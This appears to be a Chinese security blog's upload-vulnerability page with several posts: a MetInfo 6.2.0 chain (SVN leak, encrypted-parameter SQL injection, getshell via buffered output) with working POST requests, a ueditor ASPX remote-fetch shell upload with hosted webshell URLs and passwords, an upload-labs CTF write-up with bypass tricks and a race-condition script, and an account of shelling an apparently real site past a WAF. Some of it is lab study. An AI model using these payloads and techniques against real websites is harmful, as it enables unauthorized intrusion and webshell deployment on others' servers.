上传 – ChaBug安全

metinfo 6.2.0正则匹配不严谨导致注入+getshell组合拳

Y4er — Fri, 27 Sep 2019 16:23:47 +0000

今天公司做技术分享，分享了项目中的一个攻击metinfo的案例，很有意思的攻击链，记录下。

svn泄露

svn是一个开放源代码的版本控制系统，如果在网站中存在.svn目录，那么我们可以拿到网站的源代码，方便审计。关于svn泄露需要注意的是SVN 版本 >1.7 时，Seay的工具不能dump源码了。可以用@admintony师傅的脚本来利用 https://github.com/admintony/svnExploit/

在目标站中发现了http://php.local/.svn/目录泄露源代码，发现是metinfo cms，拿到了位于config/config_safe.php中的key，这个key起到了很大作用。

什么是key呢？为什么要有这个key呢？

在metinfo安装完成后，会在config/config_safe.php写入一个key，这个key是用来加密解密账户信息的，你可以在app/system/include/class/auth.class.php看到加解密算法。

可以看到加解密采用了$this->auth_key.$key作为盐值，$key默认为空，那么这个$this->auth_key在哪定义的呢？

config/config.inc.php:109

有了这个key，我们可以自己针对性去加密解密程序密文。

有什么用呢？大部分的cms都会有全局参数过滤，而metinfo的全局过滤简直变态，我们很难直接从request中找到可用的sql注入，而加了密之后的参数一半不会再进行过滤了，我们可以找下可控的加密参数。

正则匹配导致的注入

全局搜索$auth->decode寻找可控的参数，并且不走过滤的。

app/system/user/web/getpassword.class.php:93

public function dovalid() {
    global $_M;
    $auth = load::sys_class('auth', 'new');
    $email = $auth->decode($_M['form']['p']);
    if(!is_email($email))$email = '';
    if($email){
        if($_M['form']['password']){
            $user = $this->userclass->get_user_by_email($email);
            if($user){
                if($this->userclass->editor_uesr_password($user['id'],$_M['form']['password'])){
                    okinfo($_M['url']['login'], $_M['word']['modifypasswordsuc']);
                }else{
                    okinfo($_M['url']['login'], $_M['word']['opfail']);
                }
            }else{
                okinfo($_M['url']['login'], $_M['word']['NoidJS']);
            }
        }
        require_once $this->view('app/getpassword_mailset',$this->input);
    }else{
        okinfo($_M['url']['register'], $_M['word']['emailvildtips2']);
    }
}

可以看到$email直接从$_M['form']['p']中经过$auth->decode 解密获取，并没有进行过滤，然后在get_user_by_email($email)中代入数据库查询。但是经过了is_email($email)判断是否为正确的邮箱地址。

跟进app/system/include/function/str.func.php:26

function is_email($email){
    $flag = true;
    $patten = '/[w-]+@[w-]+.[a-zA-Z.]*[a-zA-Z]$/';
    if(preg_match($patten, $email) == 0){
        $flag = false;
    }
    return $flag;
}

很正常的正则表达式，但是唯一缺少的是^起始符！那么我们构造如' and 1=1-- 1@qq.com也会返回true！

email要经过$auth->decode解密，这个时候我们的key就派上用场了，我们可以使用$auth->encode()来加密我们的payload传进去，构成注入。

将auth类自己搞一份出来。

 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }else{
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

print_r(urlencode(authcode($_GET['p'],'ENCODE','cqQWPRhV91To7PmrI5Dd3FGIxjMQpLmt','0')));

需要注意这个123@qq.com是你自己注册的用户，如果met_user表中不存在一条记录，是延时不了的。

延时成功，你也可以构造布尔盲注，到此为止就是注入的部分，但是我们的目标是拿权限，一个注入就满足了？

组合拳

app/system/include/class/web.class.php:467 省略部分代码

public function __destruct(){
    global $_M;
    //读取缓冲区数据
    $output = str_replace(array('','','','','',"r",substr($admin_url,0,-1)),'',ob_get_contents());
    ob_end_clean();//清空缓冲区
...
    if($_M['form']['html_filename'] && $_M['form']['metinfonow'] == $_M['config']['met_member_force']){
        //静态页
        $filename = urldecode($_M['form']['html_filename']);
        if(stristr(PHP_OS,"WIN")) {
            $filename = @iconv("utf-8", "GBK", $filename);
        }
        if(stristr($filename, '.php')){
            jsoncallback(array('suc'=>0));
        }
        if(file_put_contents(PATH_WEB.$filename, $output)){
            jsoncallback(array('suc'=>1));
        }else{
            jsoncallback(array('suc'=>0));
        }
    }else{
        echo $output;//输出内容
    }
...
}

在前台基类web.class.php中有__destruct魔术方法，而在这个方法中使用file_put_contents(PATH_WEB.$filename, $output写入文件，其中$output是通过ob_get_contents()获取的缓冲区数据，而$filename是从$_M['form']['html_filename']拿出来的，我们可控。

但是有一个if条件$_M['form']['metinfonow'] == $_M['config']['met_member_force']，这个met_member_force在哪呢？在数据库里，我们可以通过刚才的注入拿到！

那么我们现在的目的就变为怎么去控制$output也就是缓冲区的值。

ob_start()在服务器打开一个缓冲区来保存所有的输出。所以在任何时候使用echo，输出都将被加入缓冲区中，直到程序运行结束或者使用ob_flush()来结束。

也就是说我们只要找到web.class.php或者继承web.class.php的子类中有可控的echo输出，配合刚才的注入便可以写入shell。

全局搜索extends web寻找子类，在子类中寻找可控echo输出，最终找到的是app/system/include/module/uploadify.class.php的doupfile()方法

public function set_upload($info){
    global $_M;
    $this->upfile->set('savepath', $info['savepath']);
    $this->upfile->set('format', $info['format']);
    $this->upfile->set('maxsize', $info['maxsize']);
    $this->upfile->set('is_rename', $info['is_rename']);
    $this->upfile->set('is_overwrite', $info['is_overwrite']);
}
...
public function upload($formname){
    global $_M;
    $back = $this->upfile->upload($formname);
    return $back;
}
...
public function doupfile(){
    global $_M;
    $this->upfile->set_upfile();
    $info['savepath'] = $_M['form']['savepath'];
    $info['format'] = $_M['form']['format'];
    $info['maxsize'] = $_M['form']['maxsize'];
    $info['is_rename'] = $_M['form']['is_rename'];
    $info['is_overwrite'] = $_M['form']['is_overwrite'];
    $this->set_upload($info);
    $back = $this->upload($_M['form']['formname']);
    if($_M['form']['type']==1){
        if($back['error']){
            $back['error'] = $back['errorcode'];
        }else{
            $backs['path'] = $back['path'];

            $backs['append'] = 'false';
            $back = $backs;
        }
    }
    $back['filesize'] =  round(filesize($back['path'])/1024,2);
    echo jsonencode($back);
}
...

echo的$back变量是从$_M['form']['formname']取出来的，可控，向上推看back变量的取值由$this->upfile->upload($formname)决定，跟进。

public function upload($form = '') {
    global $_M;
    if($form){
        foreach($_FILES as $key => $val){
            if($form == $key){
                $filear = $_FILES[$key];
            }
        }
    }
    if(!$filear){
        foreach($_FILES as $key => $val){
            $filear = $_FILES[$key];
            break;
        }
    }

    //是否能正常上传
    if(!is_array($filear))$filear['error'] = 4;
    if($filear['error'] != 0 ){
        $errors = array(
            0 => $_M['word']['upfileOver4'],
            1 => $_M['word']['upfileOver'],
            2 => $_M['word']['upfileOver1'],
            3 => $_M['word']['upfileOver2'],
            4 => $_M['word']['upfileOver3'],
            6 => $_M['word']['upfileOver5'],
            7 => $_M['word']['upfileOver5']
        );
        $error_info[]= $errors[$filear['error']] ? $errors[$filear['error']] : $errors[0];
        return $this->error($errors[$filear['error']]);
    }
    ...
    //文件大小是否正确{}
    if ($filear["size"] > $this->maxsize || $filear["size"] > $_M['config']['met_file_maxsize']*1048576) {
        return $this->error("{$_M['word']['upfileFile']}".$filear["name"]." {$_M['word']['upfileMax']} {$_M['word']['upfileTip1']}");
    }
    //文件后缀是否为合法后缀
    $this->getext($filear["name"]); //获取允许的后缀
    if (strtolower($this->ext)=='php'||strtolower($this->ext)=='aspx'||strtolower($this->ext)=='asp'||strtolower($this->ext)=='jsp'||strtolower($this->ext)=='js'||strtolower($this->ext)=='asa') {
        return $this->error($this->ext." {$_M['word']['upfileTip3']}");
    }
    ...
}

省略部分代码

我们要看return回去的值就是back变量的值，所以重点关注return的东西看是否可控。

首先是正常foreach取出上传文件的信息，然后判断是否能正常上传-文件大小是否正确-文件后缀是否为合法后缀，如果有错就return。到这里有两种思路。

超出文件大小getshell

在后台中最大文件大小是8m，如果我们上传一个超出8m的文件，那么upload()函数就会return $this->error("{$_M['word']['upfileFile']}".$filear["name"]." {$_M['word']['upfileMax']} {$_M['word']['upfileTip1']}"); 而这个$filear["name"]是我们可控的，在foreach中赋值的。

那么这样我们就可以把$filear["name"]改为shell，然后return回去，赋值给$back，echo进缓冲区，最后file_put_contents拿到shell，完美的利用链。

但是这个8m太大了，我们可以通过注入进后台把这个限制改为0.0008

构造下payload，需要注意metinfonow参数是上文中从数据库中取出的met_member_force

POST /admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=xwtpwmp&html_filename=1.php HTTP/1.1
Host: php.local
Content-Length: 1120
Origin: http://php.local/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename=""
Content-Type: image/jpeg

testtesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttesttest
------WebKitFormBoundary8tQiXReYsQYXHadW--

无后缀getshell

@mochazz师傅在先知上分享了一篇metinfo6.1.3的getshell，我自己测试在6.2.0中已经修复，不过还是提一下。

问题出在 app/system/include/class/upfile.class.php:139 getext()函数

如果不是合法后缀会return $this->error($this->ext." {$_M['word']['upfileTip3']}")，而$this->ext经过getext()函数，跟进

protected function getext($filename) {
    if ($filename == "") {
        return ;
    }
    $ext = explode(".", $filename);
    $ext = $ext[count($ext) - 1];
    return $this->ext = $ext;
}

直接return $ext，那么我们上传一个无后缀的文件，文件名写一句话就可以getshell

payload

POST /admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow=xwtpwmp&html_filename=1.php HTTP/1.1
Host: php.local
Content-Length: 194
Origin: http://php.local/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8tQiXReYsQYXHadW
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XDEBUG_SESSION=PHPSTORM
Connection: close

------WebKitFormBoundary8tQiXReYsQYXHadW
Content-Disposition: form-data; name="test"; filename=""
Content-Type: image/jpeg

test
------WebKitFormBoundary8tQiXReYsQYXHadW--

而在6.2.0中，加入了一行正则判断后缀，绕不过去，无法getshell

protected function getext($filename) {
    if ($filename == "") {
        return ;
    }
    $ext = explode(".", $filename);
    $ext = $ext[count($ext) - 1];
    if (preg_match("/^[0-9a-zA-Z]+$/u", $ext)) {
        return $this->ext = $ext;
    }
    return $this->ext = '';
}

总结

svn泄露分版本
注册是邮件的正则匹配问题
参数加密一般不走全局过滤找找注入
关注echo和ob_get_contents()函数说不定能写shell呢

参考链接

https://nosec.org/home/detail/2436.html
https://xz.aliyun.com/t/4425

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

ueditor编辑器上传漏洞

Y4er — Sun, 07 Oct 2018 11:12:51 +0000

ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

controller.ashx 文件默认在网站根目录

输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx


  shell addr:

一句话密码 xz

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

大马密码 r00ts

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx

upload-labs-writeup：upload-labs 上传漏洞靶场的解题方法

Y4er — Tue, 24 Jul 2018 06:44:40 +0000

0x00：前言

本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs (最新commit17ec936) 的19个上传关卡的方法。

文章适合有一定上传绕过知识基础的读者阅读，绕过原理请参考其它文章和项目源码，限于篇幅文章中不展开解释。

0x01：测试配置

可直接下载作者的配置好的PHPStudy靶场运行环境，节省时间。

浏览器	Firefox
插件	NoScript
插件	HackBar
抓包工具	Burpsuite Pro
Webshell代码

0x02：绕过方法

Pass-01

前端禁用JS，直接上传Webshell

Pass-02

截断上传数据包，修改Content-Type为image/gif，然后放行数据包

Pass-03

重写文件解析规则绕过。上传先上传一个名为.htaccess文件，内容如下：


SetHandler application/x-httpd-php

然后再上传一个03.jpg

执行上传的03.jpg脚本

Pass-04

利用PHP 和 Windows环境的叠加特性，以下符号在正则匹配时的相等性：

双引号"     =   点号.
大于符号>   =   问号?
小于符号<   =   星号*

先上传一个名为4.php:.jpg的文件，上传成功后会生成4.php的空文件，大小为0KB.

然后将文件名改为4.<或4.<<<或4.>>>或4.>><后再次上传，重写4.php文件内容，Webshell代码就会写入原来的4.php空文件中。

Pass-05

文件名后缀大小写混合绕过。05.php改成05.phP然后上传

Pass-06

利用Windows系统的文件名特性。文件名最后增加点和空格，写成06.php.，上传后保存在Windows系统上的文件名最后的一个.会被去掉，实际上保存的文件名就是06.php

Pass-07

原理同Pass-06，文件名后加点，改成07.php.

Pass-08

Windows文件流特性绕过，文件名改成08.php::$DATA，上传成功后保存的文件名其实是08.php

Pass-09

原理同Pass-06，上传文件名后加上点+空格+点，改为09.php. .

Pass-10

双写文件名绕过，文件名改成10.pphphp

Pass-11

上传路径名%00截断绕过。上传的文件名写成11.jpg, save_path改成../upload/11.php%00，最后保存下来的文件就是11.php

Pass-12

php.ini设置 magic_quotes_gpc = Off

原理同Pass-11，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成../upload/12.php【二进制00】形式

Pass-13

绕过文件头检查，添加GIF图片的文件头GIF89a，绕过GIF图片检查。

使用命令copy normal.jpg /b + shell.php /a webshell.jpg，将php一句话追加到jpg图片末尾，代码不全的话，人工补充完整。形成一个包含Webshell代码的新jpg图片，然后直接上传即可。JPG一句话shell参考示例

png图片处理方式同上。PNG一句话shell参考示例

Pass-14

原理和示例同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传存在问题，正常的图片也上传不了，等待作者调整。

Pass-15

原理同Pass-13，添加GIF图片的文件头绕过检查

png图片webshell上传同Pass-13。

jpg/jpeg图片webshell上传同Pass-13。

Pass-16

原理：将一个正常显示的图片，上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分，将Webshell代码插在该部分，然后上传。具体实现需要自己编写Python程序，人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。

这里提供一个包含一句话webshell代码并可以绕过PHP的imagecreatefromgif函数的GIF图片示例。

打开被渲染后的图片，Webshell代码仍然存在

提供一个jpg格式图片绕过imagecreatefromjpeg函数渲染的一个示例文件。直接上传示例文件会触发Warning警告，并提示文件不是jpg格式的图片。但是实际上已经上传成功，而且示例文件名没有改变。

从上面上传jpg图片可以看到我们想复杂了，程序没有对渲染异常进行处理，直接在正常png图片内插入webshell代码，然后上传示例文件即可，并不需要图片是正常的图片。

程序依然没有对文件重命名，携带webshell的无效损坏png图片直接被上传成功。

Pass-17

利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。

#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey

import hackhttp
from multiprocessing.dummy import Pool as ThreadPool


def upload(lists):
    hh = hackhttp.hackhttp()
    raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
Cookie: pass=17
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6696274297634
Content-Length: 341

-----------------------------6696274297634
Content-Disposition: form-data; name="upload_file"; filename="17.php"
Content-Type: application/octet-stream


-----------------------------6696274297634
Content-Disposition: form-data; name="submit"

上传
-----------------------------6696274297634--
"""
    code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw)
    print(str(code) + "\r")


pool = ThreadPool(10)
pool.map(upload, range(10000))
pool.close()
pool.join()

在脚本运行的时候，访问Webshell

Pass-18

刚开始没有找到绕过方法，最后下载作者Github提供的打包环境，利用上传重命名竞争+Apache解析漏洞，成功绕过。

上传名字为18.php.7Z的文件，快速重复提交该数据包，会提示文件已经被上传，但没有被重命名。

快速提交上面的数据包，可以让文件名字不被重命名上传成功。

然后利用Apache的解析漏洞，即可获得shell

Pass-19

原理同Pass-11，上传的文件名用0x00绕过。改成19.php【二进制00】.1.jpg

0x03：后记

可以发现以上绕过方法中有些是重复的，有些是意外情况，可能与项目作者的本意不符，故本文仅作为参考使用。

等作者修复代码逻辑后，本文也会适时更新。

upload-labs：一个帮你总结所有类型的上传漏洞的靶场

Y4er — Tue, 24 Jul 2018 06:39:20 +0000

upload-labs

一个帮你总结所有类型的上传漏洞的靶场

运行环境

操作系统：推荐windows（除了Pass-19必须在linux下，其余Pass都可以在windows上运行）
php版本：推荐5.2.17(其他版本可能会导致部分Pass无法突破)
php组件：php_gd2,php_exif（部分Pass需要开启这两个组件）
apache：以moudel方式连接

PS：为了节省时间，可下载Windows下集成环境，解压即可运行靶机环境。

使用

1.主界面

2.每一关

3.查看代码

总结

渗透中国某网+突破上传

Y4er — Sun, 11 Feb 2018 08:12:00 +0000

渗透吧群里发出来的站已经看到 95zz 等大佬成功拿下自己也想试试

目测高权重

win2008 + iis7 + php + mysql

前台注册

登录时的提示信息

dedecms

个人中心编辑资料

ckeditor

浏览服务器

dedecms 的界面

上传图片马

安全狗另外还有 360 主机卫士

可能是检测到了图片里的一句话

换成 array_map 类型

安全狗不拦截了

后缀改成 php

无法上传

前期信息收集得到服务器是 windows 系统

filename 改成 1.php.

上传成功但没后缀名

filename 改成 1.php[空格]

依然无法上传

猜测上传检测只是单纯的进行了 strpos('jpg',$filename)

filename 改成 1.jpg.php[空格]

上传成功

连接